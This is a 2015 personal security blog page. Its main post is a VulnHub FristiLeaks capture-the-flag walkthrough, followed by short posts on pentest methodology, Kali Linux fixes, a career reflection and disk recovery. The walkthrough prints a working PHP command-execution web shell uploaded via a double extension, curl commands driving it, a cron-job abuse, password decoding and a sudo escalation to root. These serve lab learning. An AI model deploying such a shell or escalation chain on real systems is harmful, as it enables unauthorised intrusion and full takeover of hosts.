Saturday 19 December 2015

[Vulnhub] Fristileaks: 1.3

Thanks Ar0xA for this "vuln"derful image.
This is my second completely self solved and first write up for vulnhub images. So cheers fellow #vulnhub fellas. \m/

Setup

 My (attacker) IP: 192.168.56.102  
 Vulnerable Image IP: 192.168.56.103  
 Software setup: Oracle VirtualBox on Kali 2.0  

Recon

Like any other challenge, we begin using our classic nmap -

 nmap -A -p- 192.168.56.103 -oA fristileaks  

With this we were able to enumerate the image and found out that only port 80 was open showing us -



However, the interesting part of this was the availability of robots.txt with 3 directories (/cola, /sisi, /beer), all of which had the same result - This is not the url you were looking for!

This was the guessing game part of vulnhub images, unlike my previous challenge, this time I thought I knew how most of my guesses required to be and viola, we got the right drink - fristi.

/fristi



Post this was the much obvious looking into the source code

 <meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">  
 <!--   
 TODO:  
 We need to clean this up for production. I left some junk in here to make testing easier.  
 - by eezeepz  
 -->  


At the bottom of the page we found small encoded snippet,
which much obviously directed us to this image.


 <!--   
 iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx  
 jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl  
 S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw  
 B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f  
 m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ  
 Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb  
 DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd  
 jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU  
 12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5  
 uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1  
 04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq  
 i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg  
 tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws  
 30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl  
 3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK  
 ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q  
 mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34  
 rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe  
 EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH  
 AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk  
 CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR  
 U5ErkJggg==  
 -->  






This leads us to 
By now we can all guess who the user is and what his password would be. 

/home/eezeepz

After logging in, the harder portion of the 4 hours started. We now find a file upload page.
From the enumeration, we knew the server was Apache 2.2.15 running with PHP 5.3.3.
This meant the most common config mistake to allow file upload to be x.php.png.
I quickly wrote a 5 line script and uploaded it on the server. 

 <?php  
 if(isset($_REQUEST['cmd'])){  
   $cmd = ($_REQUEST["cmd"]);  
   system($cmd);  
   echo "</pre>$cmd<pre>";  
   die;}  
 ?>  

The best way to get output from this shell is via curl -
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=ls"  

/home/admin

Somehow I didn't mind this interface and didn't bother getting a reverse tcp connection until a later stage.
After this, I went through the regular techniques of traversing until.

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat ../../../notes.txt"  
 hey eezeepz your homedir is a mess, go clean it up, just dont delete  
 the important stuff.  
 -jerry  
 </pre>cat ../../../notes.txt<pre>  


After going to /home/eezeepz and analyzing the contents, I got hold of
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/eezeepz/notes.txt"  
 Yo EZ,  
 I made it possible for you to do some automated checks,   
 but I did only allow you access to /usr/bin/* system binaries. I did  
 however copy a few extra often needed commands to my   
 homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those  
 from /home/admin/  
 Don't forget to specify the full path for each binary!  
 Just put a file called "runthis" in /tmp/, each line one command. The   
 output goes to the file "cronresult" in /tmp/. It should   
 run every minute with my account privileges.  
 - Jerry  
 </pre>cat /home/eezeepz/notes.txt<pre>  



Trying to traverse into /home/admin/ gave me an *Permission Denied* Error. So going through last half of this message again, the path was pretty clear.
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo 'chmod 777 /home/admin'>/tmp/runthis"  


Unfortunately, this attempt failed because we didn't read the entire message.
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"  
 command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin  

So retrying,
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo '/home/admin/chmod 777 /home/admin'&gt;/tmp/runthis"  

We get,

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"  
 command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin  
 executing: /home/admin/chmod 777 /home/admin  

Aha. Now we could go into the /home/admin directory.

/home/fristigod

Analyzing the contents of this directory, we could see a few interesting files -

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptedpass.txt"
 mVGZ3O3omkJLmy2pcuTq  
 </pre>cat /home/admin/cryptedpass.txt<pre>  

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptpass.py" 
 #Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn<br />  
 import base64,codecs,sys  
 def encodeString(str):  
     base64string= base64.b64encode(str) 
     return codecs.encode(base64string[::-1], 'rot13')
 cryptoResult=encodeString(sys.argv[1])
 print cryptoResult
 </pre>cat /home/admin/cryptpass.py<pre> 
 
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/whoisyourgodnow.txt"  
 =RFn0AKnlMHMPIzpyuTI0ITG
 </pre>cat /home/admin/whoisyourgodnow.txt<pre>  

Quickly writing a decoding program (edited the same prog, hence no naming convention followed)

 $ cat decryptpass.py
 #!/usr/bin/python
 import base64,codecs,sys
 def encodeString(str):
     base64string = codecs.encode(str[::-1], 'rot13') //since English Language has 26 alphabets, we only need to do rot13 to get back the original 
     return base64.b64decode(base64string) // base64 decoding 
 cryptoResult=encodeString(sys.argv[1])
 print cryptoResult


So decrypting the results -

 $ python decryptpass.py mVGZ3O3omkJLmy2pcuTq
 thisisalsopw123
 $ python decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
 LetThereBeFristi!


So now that we have two sets of passwords, we try them on the user accounts. On accessing the /home/ directory, we saw three user profiles - admin, ezzeepz and fristigod. The only major problem was for running a sudo command and elevate privileges, I would require a tty, for which I needed a stable reverse shell and not only a php web shell. After attempting to build a custom simple shell and failing muiltiple times (netcat and telnet were not there in the system so was trying to get a php or pyton reverse tcp connection), I just switched back to my script kiddie nature and used php-reverse-shell to get access into the machine.

/root/

Launching a tty to escalate privileges with sudo can be done with the python one liner (Thank you Pentest monkey, again)

 $ python -c 'import pty; pty.spawn("/bin/sh")'

After this I was able to figure out the credentials of admin(thisisalsopw123) and fristigod(LetThereBeFristi!).
My hope of Admin being the sudo user was thrashed and on running find / -perm -4000, I pretty much got the idea who the sudo user is (last line - find: `/var/fristigod': Permission denied).

After su fristigod, I ran  find / -perm -4000 to find

 /var/fristigod/.secret_admin_stuff/doCom

Unfortunately,
 bash-4.1$ ./var/fristigod/.secret_admin_stuff/doCom 
 ./var/fristigod/.secret_admin_stuff/doCom 
 Nice try, but wrong user ;) 

traversing into the directory, I figured doCom was accessible only via root perms, but the perms to this folder was given to fristigod. This was the obvious point of escalation. Hence I tried harder,

 bash-4.1$ sudo ./doCom  
 sudo ./doCom
 Sorry, user fristigod is not allowed to execute './doCom' as root on localhost.localdomain. 

This point I knew I had to run as a different user. On analyzing the /etc/passwd I saw a user named fristi. I knew this was the user. However, I still run 

 bash-4.1$ sudo -l
 sudo -l
 Matching Defaults entries for fristigod on this host:
  requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
  DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
  PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
  LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
  LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
  LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
  secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 User fristigod may run the following commands on this host:
  (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom   

This was the confirmation. The next command gave me access to this file

 bash-4.1$ sudo -u fristi ./doCom
 sudo -u fristi ./doCom
 Usage: ./program_name terminal_command ...

This was simple now,

 bash-4.1$ sudo -u fristi ./doCom /bin/bash
 sudo -u fristi ./doCom /bin/bash 
 bash-4.1# id  
 id
 uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Pwn'd. Now for the flag -


 bash-4.1# cd /root  
 cd /root  
 bash-4.1# ls   
 ls  
 fristileaks_secrets.txt  
 bash-4.1# cat fristileaks_secrets.txt  
 cat fristileaks_secrets.txt  
 Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]  
 I wonder if you beat it in the maximum 4 hours it's supposed to take!  
 Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)  
 Flag: Y0u_kn0w_y0u_l0ve_fr1st1  

And w00t w00t! Fristileaks solved within 4 hours :)
Hope to continue pwn'ing such challenges from Vulnhub.

Monday 14 September 2015

[Penetration Testing] Pwn without Payloads

The normal procedure of any black box penetration testing/ hacking is generally projects are generally dependent on the procedures of exploitation. Generally most of the clients would get freaked out if you would run payloads on the machines. And normally, if the payloads are available, ever we wouldn't be able to tell if they would be functioning correctly or would they be harming a system in a way that would impact any production system you run it on.

Problems faced during black box penetration testing


Too strict configuration of security policies - This sure is a good way to keep off script kiddies but is also if mis-configured, it can lead to a Denial of Service for the entire internal network.
Leaving the above problem alone, I remember one of my colleagues getting called on his mobile and asked for explanation for attacking the network by the SOC team of a client (Yes! Not only traced the attacks back to him but also were able to retrieve his mobile information - pro hax0r pwn'd).
So being too noisy in an internal penetration test would not only sometimes get you into denial of service zone, would also compromise your identity sometimes and disrupt your entire engagement.

Another HUGE problem being a black-box pentester is a "No exploits must be run" statement by the client. This statement would be great if it was a Compliance Audit or Compliance Review, however in a blackbox pentest it feels stupid. However, clients "pay".

Pwning without Payloads


Since those incidences and requirements, I realized the importance of being more silent and less violent and malicious in the network, especially during a black box penetration test.

A typical penetration testing life cycle would include -
Information Gathering - Service Enumeration - Penetration - Maintaining Access - Housekeeping

Our approach in a black box penetration test -
Intelligence Gathering - Information Gathering + Service Enumeration = 80% of our work (40% for entry point)
Penetration = 5% of our work
Lateral Movement = 55% of our work (40% intelligence gathering post exploitation + 15% penetration into the crown of the network)

Typically, we would never require to go into Maintaining Access would never be required in our internal penetration tests and hence required Housekeeping would be extremely less.

Intelligence Gathering (Information Gathering and Service Enumeration) - (40%)


My colleague and friend Vijay Kumar (bitvijays) has a good blog written for the Intelligence Gathering phase of a black box penetration test. It basically involves Active fingerprinting, passive fingerprinting, Internal infrastructure mapping, and sometimes employee reconnaissance.

Penetration - (5%)


The penetration phase would include less of exploitation. Most of our compromise would be done using the following two techniques.

LLMNR and NBT poisoning
Extracting Windows credentials (locally)

Lateral Movement (55%)


A combination of further Intelligence gathering and penetration using the following two techniques.

Powershell Enumeration (40% worth of intelligence gathering)
Gaining access to the Crown  (15% worth penetration)

Most of the black box penetration tests would be successful with just these techniques since the architecture of all enterprise trust anyone or anything in the physical location, without proper segregation.

I would be uploading demonstrations of all these processes slowly, one by one. I am also working on a script that could automate most of the process. But these would take some time.
So, those interested in these topics can feel free to get in touch with me for a faster reply on how to launch these attacks.

Saturday 12 September 2015

[Quick-Fix] Kali 2.0 wireless bug

So even after a fresh install of Kali Linux 2.0, few of the applications still seem buggy. One of them would be the wireless hacking module airmon-ng.
Ok! So while I was trying to sniff the networks around my hotel, I faced this bug with airmon-ng and I spent a good half an hour trying to understand what was going wrong as the tool based world gets you addicted to the tools so much that you sometimes are mislead by the errors.

This bug occurs while trying to sniff wireless traffic after attempting to set the wireless network card into Monitoring Mode.
~# airmon-ng start wlan0
...
~# airodump-ng wlan0mon
ioctl(SIOCSIWMODE) failed: Device or resource busy

This error basically occurs because airmon-ng fails in setting the wireless network card in monitoring mode. Hence the quick resolution to this would be setting the network card into monitoring mode.

~# ifconfig wlan0mon down
~# iwconfig wlan0mon mode monitor
~# ifconfig wlan0mon up
~# airodump-ng wlan0mon

And, tadaaaaaaaaaaaaaaaaaaaaaa......!!!!!!!
This should get your wireless cards into sniffing mode and then happy hacking to you folks.

Update:
Another way to get this running (I guess this is the official solution that I saw in kali forums) -

~# airmon-ng check kill




Have Fun with the WiFu.

Tuesday 18 August 2015

[Quick-Fix] Kali 1.1 to Kali 2.0 update bug

A few hours ago I just tried to do a upgrade of my Kali 1.1.0 to the new and beautiful looking Kali 2.0 with the apt-get update && apt-get dist-upgrade way. The result was as terrible as I had expected. A complete crash with only message.
Oh no! Something has gone wrong.
A problem has occurred and the system can't recover.
Please log out and try again.
A terrible feeling when the grey page looks at your face and your head says to you,
"hah you should have rather done a fresh install and wasted 10 hours from your life taking a backup and reformatting your LVM encrypted system."

Here is a small bypass for all the folks who are just going to wait for the guys behind Kali to fix this issue, just like me.

Ok firstly open the below file in an editor
root@kali:~# nano /etc/gdm3/daemon.conf

Now add the following two lines. These enable the system to auto log into the non-root user after booting up. I still haven't completed the debugging process and hence am not able to give the exact reason for this error.
AutomaticLoginEnable = true
AutomaticLogin = <Non-root Username>

Enabling automatic login into root user is not recommended, also it will not work for root user.

Friday 31 July 2015

[Gyan/ Knowlege] From Con to Consultant

Among my recent promises to myself to write blogs, get certifications, etc. my venture into the hacker world, participating and topping the table of capture the flag, secured me the position of a Penetration Tester in one of the Big Four firms. In the past few months of being a random hackerboy on the internet space who gained pocket money from bug bounties, fame from free goodies there was a sudden drift to convert into a absolute and perfect human. This drift from fame to money, from loose shirts and jeans to walking in suits (Nope, NSA aren't the only one that wear suits), has probably been the most incredible journey of my life.

Even though incredible, the life changing from a hackerboy to a corporate man is terrible. It is like a burden of responsibilities you specifically avoided till today, suddenly seemed to grasp hold of you and pull you down. The expectation of following decorum and maturity in a person is like a sea water fish suddenly finds itself in the depths of pacific ocean. However, having the unusual luck of working under the guidance of the top levels of the organization (Yup! My first project and I get to learn from the best) made me push harder and harder until I realized I could pull myself up and stand up face to face and look into their eyes and say, "Look my good Sir! I exist!". For my utter surprise, the motivation, the energy and the vibe spread by these top level folks are astonishingly awesome and the attention you are given seemed to be particularly amazing (Yes! When people with 15+ years of industry experience looks up at you and says good work - now feel my feeling).

Consultants are often looked up as all knowledgeable folks, who have extreme knowledge in especially what they do. Keeping up with these expectations are particularly hard, but then the challenge involved in it is what keeps you on your toes and learning. With an extremely techie security consulting astronomer (Yes. WTH?!) I was able to increase my Linux skills and with the guidance of an ever hardworking manager I am still shaping up to become a total corporate guy. However this journey of fame to money, deepweb to whiteweb, blackhat to whitehat, hacker to penetration tester, con to consultant is an extremely exciting and learning filled transition, especially for all those Kevin Mitnik(s) who love to social engineer out there. Because remember,
If you can't sell it, don't bother making it.

Friday 13 March 2015

[Trick] Fixing External Hard Disk Drive and Recover data

My very first personal External Hard Disk Drive of 500 GB that I won at a competition, abruptly decided to change its' format into RAW, refusing to give me access to the drive. I pretty much choked on this fact because I hadn't kept any kind of backup of this drive and wasn't ready to give up on the contents this drive had and its' esthetic value. A lot of searching on numerous websites led me to find enormous ways to reformat the disk partition into NTFS. However, I soon realized that instead of the diskpart measure to totally format the disk, chkdsk did a better job in analyzing the disk and recovering it into its' previous state. The recovery follows three simple steps.

Step 1: Open your disk management window

First <Windows Key> + R, then open diskmgmt.msc


Step 2: Analyse the File Systems and the Partitions

Here you need to see which file system needs to be rectified. In this partition, you can format, rename, change drive letters and paths, explore, and play around with all the partitions easily.
My hard disk here is the H: partition that brilliantly changed its' file system format to RAW, causing me a lot of inconvenience.



Step 3: CHKDSK

Chkdsk is available only when you open your DOS prompt in Administrator mode. To do this, you can open your windows explorer, go to
file>open command prompt> Open Command Prompt as administrator
Now when the window opens up, quickly type in

chkdsk /f <desired drive letter>

And that is it. Your hard work (actually my hard work at 2 am) is complete. Drum Roll........... *Ba Dum Tuss*